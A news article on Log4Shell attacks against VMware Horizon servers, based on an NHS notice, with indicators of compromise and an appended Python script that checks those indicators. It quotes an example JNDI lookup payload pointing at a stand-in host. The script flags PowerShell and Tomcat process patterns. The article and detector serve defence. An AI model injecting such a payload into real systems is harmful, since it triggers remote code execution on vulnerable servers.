Criminals are actively exploiting the high-severity Log4Shell vulnerability on servers running VMware Horizon with the aim of installing malware that allows them to take full control of affected systems, warns the UK’s public healthcare system.
CVE-2021-44228 is one of the most serious vulnerabilities brought to light in recent years. It resides in Log4J, a library of system logging code used in thousands, if not millions, of third-party apps and websites. This means that there is a huge base of vulnerable systems. Additionally, the vulnerability is extremely easy to exploit and allows attackers to install web shells, which provide a command window to execute highly privileged commands on hacked servers.
The remote code execution flaw in Log4J emerged in December, when exploit code was released before a fix was available. Malicious hackers quickly began to actively exploit CVE-2021-44228 to compromise sensitive systems.
Attacks, including those targeting VMware Horizon, have continued since then.
“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks,” officials from the UK’s National Health System wrote. They then provided advice on specific actions that affected organizations can take to mitigate the threat.
The main one is the recommendation to install an update that VMware released for its Horizon product, which gives organizations a way to virtualize desktop and application capabilities using enterprise virtualization technology. NHS officials have also noted signs that vulnerable organizations can look for to identify possible attacks they may have suffered.
The notice comes a day after the Federal Trade Commission warned consumer-oriented companies to fix vulnerable systems to avoid the fate of Equifax. In 2019, the credit reporting agency agreed to pay $575 million to settle the FTC’s charges resulting from its failure to fix an equally serious vulnerability in another piece of software, Apache Struts. When an unknown attacker exploited the vulnerability on Equifax’s network, it led to the compromise of sensitive data for 143 million people, making it one of the worst data breaches on record.
“The FTC intends to use all of its legal authority to prosecute companies that fail to take reasonable steps to protect consumer data from exposure to Log4j or similar known vulnerabilities in the future,” FTC officials noted.
The NHS is at least the second organization to observe exploits targeting a VMware product. Last month, researchers reported that attackers were targeting systems running VMware vCenter in order to install the Conti ransomware.
Attacks on unpatched VMware Horizon servers go after its use of an open source service, Apache Tomcat.
“The attack is most likely launched via a Log4Shell payload similar to `${jndi:ldap://example.com}`,” the NHS notice said. “The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is integrated with VMware Horizon. This then launches the following PowerShell command, generated from ws_TomcatService.exe:”
After a few more steps, attackers are able to install a web shell that has permanent communication with a server they control. Here is a representation of the attack:
The notice added:
Organizations should look for the following:
- Evidence of ws_TomcatService.exe spawning abnormal processes
- Any powershell.exe process containing ‘VMBlastSG’ in command line
- File changes in ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ – This file is usually overwritten during upgrades and is not otherwise changed
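The three indicators above, turned into a minimal check over process-creation records plus a baseline hash of absg-worker.js. This is an added example, not code from the NHS notice or the article; the record fields, the child-process allowlist, the file paths and the sample telemetry are this example's own assumptions.

```python
import hashlib
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation record (Sysmon Event ID 1 / Security 4688 style); field names are this example's own."""
    parent_image: str
    image: str
    command_line: str


# Assumption: the only child ws_TomcatService.exe is expected to start on a healthy Horizon host.
# Tune this from a known-good baseline; anything else is reported as abnormal.
EXPECTED_TOMCAT_CHILDREN = {"conhost.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_process_event(ev: ProcEvent) -> list:
    """Return the names of the NHS indicators this event matches (empty list if none)."""
    hits = []
    # Indicator 1: ws_TomcatService.exe spawning a process outside the baseline
    if _basename(ev.parent_image) == "ws_tomcatservice.exe" and _basename(ev.image) not in EXPECTED_TOMCAT_CHILDREN:
        hits.append("tomcat-abnormal-child")
    # Indicator 2: powershell.exe whose command line references VMBlastSG
    if _basename(ev.image) == "powershell.exe" and "vmblastsg" in ev.command_line.lower():
        hits.append("powershell-vmblastsg")
    return hits


def absg_worker_modified(current_bytes: bytes, baseline_sha256: str) -> bool:
    """Indicator 3: absg-worker.js differs from the hash recorded right after the last Horizon upgrade."""
    return hashlib.sha256(current_bytes).hexdigest() != baseline_sha256


def scan(events: list) -> dict:
    """Map event index -> matched indicators, only for events that matched something."""
    return {i: flag_process_event(ev) for i, ev in enumerate(events) if flag_process_event(ev)}


# Constructed sample telemetry (not real captures); paths are assumed install locations.
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(TOMCAT, r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4"),  # baseline child, no hit
    ProcEvent(TOMCAT, PS, 'powershell.exe -NoProfile -Command "# constructed line mentioning VMBlastSG"'),  # both hits
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile"),  # ordinary admin use, no hit
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))  # {1: ['tomcat-abnormal-child', 'powershell-vmblastsg']}
```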
Security firm Praetorian released this tool on Friday to identify vulnerable systems at scale.